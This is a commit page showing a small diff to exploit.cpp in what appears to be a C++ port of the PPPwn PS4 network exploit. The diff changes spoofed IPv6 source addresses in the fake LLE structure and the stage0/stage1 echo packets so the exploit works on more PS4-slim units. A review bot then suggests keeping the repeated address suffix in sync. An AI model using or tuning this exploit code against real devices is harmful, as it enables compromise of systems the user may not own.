
Commit ed5f907

authored
Use IPv6 address that works on all devices. Thanks to Borris-ta. (xfangfang#74)
Updated exploit.cpp to match the original PPPwn repository so that the exploit works on some PS4-slim units where it previously did not. Thanks to TheOfficialFlow and Borris-ta for their findings.
1 parent cbc09a3 commit ed5f907


1 file changed

+5
-5
lines changed


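--- a/src/exploit.cpp
+++ b/src/exploit.cpp
@@ -50,7 +50,7 @@
 
 const static std::string SOURCE_MAC = "41:41:41:41:41:41";
 const static std::string SOURCE_IPV4 = "41.41.41.41";
-const static std::string SOURCE_IPV6 = "fe80::4141:4141:4141:4141";
+const static std::string SOURCE_IPV6 = "fe80::9f9f:41ff:9f9f:41ff";
 
 const static std::string TARGET_IPV4 = "42.42.42.42";
 
@@ -550,7 +550,7 @@ std::vector<uint8_t> Exploit::build_fake_lle(Exploit *self) {
 V32(fake_lle, 0xC4, 0); // sin6_flowinfo
 // sin6_addr
 V64BE(fake_lle, 0xC8, 0xfe80000100000000);
-V64BE(fake_lle, 0xD0, 0x4141414141414141);
+V64BE(fake_lle, 0xD0, 0x9f9f41ff9f9f41ff);
 V32(fake_lle, 0xD8, 0); // sin6_scope_id
 
 // pad
@@ -737,7 +737,7 @@ int Exploit::stage0() {
 }
 
 std::stringstream sourceIpv6;
-sourceIpv6 << "fe80::" << std::setfill('0') << std::setw(4) << std::hex << i << ":4141:4141:4141";
+sourceIpv6 << "fe80::" << std::setfill('0') << std::setw(4) << std::hex << i << ":41ff:9f9f:41ff";
 {
 auto &&packet = PacketBuilder::icmpv6Echo(this->source_mac, this->target_mac,
 pcpp::IPv6Address(sourceIpv6.str()), this->target_ipv6);
@@ -860,7 +860,7 @@ int Exploit::stage1() {
 
 sourceIpv6.clear();
 sourceIpv6.str("");
-sourceIpv6 << "fe80::" << std::setfill('0') << std::setw(4) << std::hex << i << ":4141:4141:4141";
+sourceIpv6 << "fe80::" << std::setfill('0') << std::setw(4) << std::hex << i << ":41ff:9f9f:41ff";
 
 {
 auto &&packet = PacketBuilder::icmpv6Echo(this->source_mac, this->target_mac,
@@ -1137,4 +1137,4 @@ void Exploit::stop() {
 // Force stop capture even if blocking mode is enabled
 pcap_breakloop(pcapHandle(*dev));
 stopThread(*dev) = true;
-}
+}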
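Review bot: The same address suffix is now spelled out by hand in four places, and nothing in the code says they have to agree: the `SOURCE_IPV6` string, the `0x9f9f41ff9f9f41ff` constant written at offset 0xD0 in `build_fake_lle`, and the `":41ff:9f9f:41ff"` stream literal in both `stage0` and `stage1`. This commit had to edit each one separately, so a later change that misses one would presumably leave the sin6_addr field and the echo packets' source address inconsistent. A comment at the definition would record the dependency, e.g. `// low 64 bits are repeated in build_fake_lle() and in the stage0/stage1 echo source address; keep in sync`, and the two identical stream expressions could take the suffix from one file-local constant. The enclosing functions start and end outside the hunks, so how `i` is bounded before it is formatted with `std::setw(4)` cannot be checked from here.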
